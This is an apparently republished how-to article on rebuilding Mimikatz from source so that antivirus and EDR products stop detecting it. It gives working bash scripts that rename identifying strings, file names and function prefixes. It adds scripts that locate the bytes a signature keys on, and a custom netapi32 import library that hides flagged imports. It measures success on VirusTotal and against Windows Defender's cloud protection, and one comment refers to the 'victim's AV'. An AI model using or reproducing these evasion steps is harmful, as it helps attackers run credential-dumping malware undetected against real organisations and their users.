2025-01-18 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 06/02 Report
This article shows how to build custom Mimikatz binaries by modifying the source code so that the resulting binary is no longer flagged by antivirus and EDR products.
Introduction
How to build custom Mimikatz binaries by modifying the source code and bypass antivirus / endpoint detection and response products.
There are a lot of articles in the community about Mimikatz obfuscation, but most of them focus on getting Invoke-Mimikatz past AMSI or on PowerShell obfuscation tools. Instead, I chose to build a custom version of Mimikatz from source that is not flagged by antivirus products. The starting point is the following script:
#!/usr/bin/env bash
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like
# "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com"..., so removing them from the
# project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa",
# "logonpasswords", "lsadump", "minidump", "pth", but this needs adapting to the
# documentation, so it has not been done. Try it if your victim's AV still detects
# mimikatz after this script.
set -eu

# Clone as "windows" and move the mimikatz/ project directory to windows/ as well,
# so the renamed sources keep a consistent tree.
git clone https://github.com/gentilkiwi/mimikatz.git windows
mv windows/mimikatz windows/windows

# replace OLD NEW: rewrite a string in the contents of every file (sources,
# .vcxproj/.sln, .rc). The .git directory is skipped so the clone is not corrupted.
# GNU sed syntax; on macOS use sed -i '' instead of sed -i.
replace() {
    find windows/ -type f -not -path '*/.git/*' -print0 | xargs -0 sed -i "s/$1/$2/g"
}

replace mimikatz windows
replace MIMIKATZ WINDOWS
replace Mimikatz Windows
replace DELPY James
replace Benjamin Troy
replace benjamin@gentilkiwi.com jtroy@hotmail.com
replace creativecommons python
replace gentilkiwi MSOffice
replace KIWI ONEDRIVE
replace Kiwi Onedrive
replace kiwi onedrive

# Rename the files themselves with the same mapping, so the project files
# (already rewritten above) still point at existing sources.
find windows/ -type f -name '*mimikatz*' | while read -r FILE; do
    newfile="$(echo "${FILE}" | sed -e 's/mimikatz/windows/g')"
    mv "${FILE}" "${newfile}"
done
find windows/ -type f -name '*kiwi*' | while read -r FILE; do
    newfile="$(echo "${FILE}" | sed -e 's/kiwi/onedrive/g')"
    mv "${FILE}" "${newfile}"
done
Next, let's take a look at how to build a custom Mimikatz binary.
Mimikatz is flagged as malware
There is no doubt that every Mimikatz release you download will be flagged as malware by antivirus products, because so many attackers use Mimikatz and other open source projects in real intrusions. Far fewer people know why these open source projects are flagged and how the detection actually works.
Real attackers and penetration testers generally do not use the release build of the project; they build their own, and often compile only the parts of the Mimikatz source they need. In this post we modify the source while keeping the original functionality, and measure the detection rate after each change. Building from customised source therefore remains the best practice.
Basic characteristics
To remove the most obvious characteristics of Mimikatz, we first replace the following strings:
1. mimikatz, MIMIKATZ and Mimikatz
2. DELPY, Benjamin, benjamin@gentilkiwi.com
3. creativecommons
4. gentilkiwi
5. KIWI, Kiwi and kiwi
From an antivirus vendor's point of view, these strings in the source are the first thing to write a signature on. If you open the Mimikatz menu, you will see the information shown in the following figure:
All of the strings in that banner prove that Mimikatz is running, so we add the following strings to the replacement script as well:
"A La Vie, A L'Amour"
http://blog.gentilkiwi.com/mimikatz
Vincent LE TOUX
vincent.letoux@gmail.com
http://pingcastle.com
http://mysmartlogon.com
Alternatively, open mimikatz.c directly and replace the banner, or delete it altogether.
Next, we need to replace some functional keywords. The main modules in Mimikatz are as follows:
1. crypto, dpapi, kerberos, lsadump, ngc, sekurlsa
2. standard, privilege, process, service, ts, event
3. misc, token, vault, minesweeper, net, busylight
4. sysenv, sid, iis, rpc, sr98, rdm, acr
We can also enter an invalid module name (for example, just ::) to list all available modules:
Here we have two choices: either rewrite all command names in upper case, or rename them outright. With the first method the familiar commands keep working, because Mimikatz matches module and command names case-insensitively, so nothing changes for the operator. With the second method we have to remember the new names. For now we keep the familiar command names, because a careless rename can easily break the original functionality. To produce a fresh binary for each new version, the strings that are independent of the command names are replaced with random names instead.
Another important thing to replace is the icon of the binary. In the modified version of the gist, the existing icons are therefore swapped for some randomly downloaded ones.
Each module in the main menu has sub-commands. For example, the best-known module, sekurlsa, contains the following:
1. msv, wdigest, kerberos, tspkg
2. livessp, cloudap, ssp, logonpasswords
3. process, minidump, bootkey, pth
4. krbtgt, dpapisystem, trust, backupkeys
5. tickets, ekeys, dpapi, credman
Make sure that most of the familiar Mimikatz identifiers have been modified, including the sub-command names. Script sample code: [link].
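A check that is worth running after the rename script and again after the build, added here as an example and not part of the original post or of the Mimikatz project: scan a file for any of the tell-tale markers that are left. Mimikatz is compiled with wide (UTF-16LE) string literals, so a plain grep on the .exe sees nothing even when "mimikatz" is still in it; deleting NUL bytes first turns UTF-16LE ASCII text back into plain ASCII, so one grep covers both encodings. The marker list is an assumption built from the strings named above; extend it with whatever your own build still leaks.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): report which tell-tale strings
# survive in a source file or a compiled binary, in ASCII or UTF-16LE form.
set -eu

# Markers from the post, plus the functional keywords the rename script
# deliberately leaves alone (so you can see how much they contribute).
# Assumed list; extend it for your own build.
MARKERS="mimikatz gentilkiwi benjamin@gentilkiwi.com delpy kiwi kuhl_m_ kull_m_ sekurlsa logonpasswords lsadump"

# leftover_markers FILE: print "marker<TAB>count" for every marker that still
# occurs (case-insensitive). Exit 0 if anything leaked, 1 if the file is clean.
# tr -d '\000' strips the high bytes of UTF-16LE ASCII text, so "K\0i\0w\0i\0"
# is seen as "Kiwi"; grep -a treats the binary as text.
leftover_markers() {
    local file="$1" m n leaked=1
    for m in $MARKERS; do
        n=$(tr -d '\000' < "$file" | grep -a -o -i -F -- "$m" | wc -l | tr -d ' ')
        if [ "$n" -gt 0 ]; then
            printf '%s\t%s\n' "$m" "$n"
            leaked=0
        fi
    done
    return "$leaked"
}

# leftover_in_tree DIR: run the check over a whole source or build tree and
# list every file that leaks, e.g. leftover_in_tree windows/
leftover_in_tree() {
    find "$1" -type f -not -path '*/.git/*' | while IFS= read -r f; do
        if report=$(leftover_markers "$f"); then
            printf '== %s\n%s\n' "$f" "$report"
        fi
    done
}

# Usage after a build: leftover_markers x64/windows.exe
```

Run it against the compiled binary, not only the source tree: the resource section (version info, banner) and the import table are where strings typically survive a sed pass over the sources.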
After running the Bash script, compiling the code and uploading the result to VirusTotal, we get the following:
25 of 67 engines still flag it, which is certainly not good enough.
netapi32.dll
To find the remaining signatures, we can cut the file into prefixes of increasing length with the following command:
head -c byteLength mimikatz.exe > split.exe
If Windows Defender deletes the resulting fragment, the signature lies within those bytes; if the fragment is left alone, that part of the file is clean. The DefenderCheck tool automates this: it splits the file into pieces, copies them to the C:\temp\ directory and scans them with Windows Defender:
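The split-and-scan loop above, written out as a binary search so that it needs about log2(size) scans instead of one per chunk. This is an added example, not the original post's script and not DefenderCheck itself. The detector here is a stand-in oracle that greps for an assumed marker string; on a real host, replace is_flagged with a scan of the fragment (for example MpCmdRun.exe -Scan -ScanType 3 -File <fragment>) and treat "fragment quarantined or reported" as flagged.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): find the shortest prefix of a
# file that the detector still flags, i.e. the offset just past the bytes
# that trigger the signature.
set -eu

MARKER="gentilkiwi"      # assumed marker, stands in for a real AV signature

# is_flagged FILE: exit 0 if the detector fires on FILE. Replace the body
# with a real scan (e.g. MpCmdRun.exe on the fragment) when hunting signatures.
is_flagged() {
    grep -q -a -F -- "$MARKER" "$1"
}

# find_signature_end FILE: print the length of the shortest flagged prefix,
# or 0 if the whole file is clean.
find_signature_end() {
    local file="$1" size lo hi mid frag
    size=$(wc -c < "$file" | tr -d ' ')
    if ! is_flagged "$file"; then
        echo 0
        return 0
    fi
    frag=$(mktemp)
    lo=1
    hi=$size
    # Invariant: the prefix of length hi is flagged, the prefix of length lo-1 is not.
    while [ "$lo" -lt "$hi" ]; do
        mid=$(( (lo + hi) / 2 ))
        head -c "$mid" "$file" > "$frag"
        if is_flagged "$frag"; then
            hi=$mid
        else
            lo=$(( mid + 1 ))
        fi
    done
    rm -f "$frag"
    echo "$lo"
}

# Usage on a real build, then dump the bytes just before the reported offset:
#   end=$(find_signature_end mimikatz.exe)
#   tail -c +$(( end > 64 ? end - 63 : 1 )) mimikatz.exe | head -c 80 | od -c
```

The search assumes that a longer prefix is never "cleaner" than a shorter one, which holds for a plain byte-pattern signature but not for every engine: a cut can also destroy the PE header a heuristic depends on, and cloud or ML verdicts are not deterministic. Confirm the bytes at the reported offset by hand before deciding what to rename.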
The following three functions imported from netapi32.dll are flagged by Windows Defender:
I_NetServerAuthenticate2
I_NetServerReqChallenge
I_NetServerTrustPasswordsGet
Here, we can create a .def file with the following content and build a custom netapi32.min.lib from it. These are undocumented exports, so check the ordinals against the netapi32.dll of the target Windows build with dumpbin /exports before relying on them:
LIBRARY netapi32.dll
EXPORTS
    I_NetServerAuthenticate2 @59
    I_NetServerReqChallenge @65
    I_NetServerTrustPasswordsGet @62
At this point, we can build the netapi32.min.lib file in the Visual Studio developer command prompt (use /MACHINE:X86 for a 32-bit build):
lib /DEF:netapi32.def /OUT:netapi32.min.lib /MACHINE:X64
We drop this file into the lib\x64\ directory and recompile. Running DefenderCheck again, nothing is detected:
This means we have bypassed Windows Defender's "real-time protection" feature. However, if cloud-delivered protection is enabled and the file is copied to another location, it is still detected:
Replace more strings
Of course, there is still a lot to replace. First, the more obvious strings. The Mimikatz menu carries a description of every command; for example, the privilege module has the following descriptions:
We can replace all of these descriptions by adding them as strings to our Bash script. Not all of them are needed, for instance the following:
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
Many antivirus vendors also flag the DLLs a binary loads and the functions it resolves from them. Mimikatz resolves a lot of functions from DLL files. To find the DLL names in the Mimikatz source, open the project in Visual Studio and press Ctrl + Shift + F, which searches the entire project; search for .dll to list every DLL the project uses, then add those names to the Bash script for replacement.
Directory & file structure
The directory structure of the project also seems to be one of the things antivirus products key on, and all the internal function names are prefixed with kuhl_ or kull_:
We can replace these prefixes with random tokens as well:
# rand_ident: four random lowercase letters; reroll if the result is a C keyword
# (void, char, long, enum, case, else, goto, auto), which would break the build.
rand_ident() {
    local s
    while :; do
        s=$(LC_ALL=C tr -dc 'a-z' < /dev/urandom | head -c 4)
        case "$s" in
            void|char|long|enum|case|else|goto|auto|bool|true) ;;
            *) echo "$s"; return ;;
        esac
    done
}

# rename_prefix OLD NEW: rewrite OLD in file contents first, then in file names,
# so the .vcxproj entries (already rewritten) still match the files on disk.
rename_prefix() {
    find windows/ -type f -not -path '*/.git/*' -print0 | xargs -0 sed -i "s/$1/$2/g"
    find windows/ -type f -name "*$1*" | while read -r FILE; do
        newfile="$(echo "${FILE}" | sed -e "s/$1/$2/g")"
        mv "${FILE}" "${newfile}"
    done
}

kuhl=$(rand_ident)
rename_prefix kuhl "$kuhl"
kull=$(rand_ident)
rename_prefix kull "$kull"
under=$(rand_ident)
rename_prefix _m_ "$under"
Bash script: [link]
After running the Bash script, compile again and upload the result to VirusTotal:
Although the detection rate has not changed much, the binary now also gets past Windows Defender with cloud-delivered protection enabled: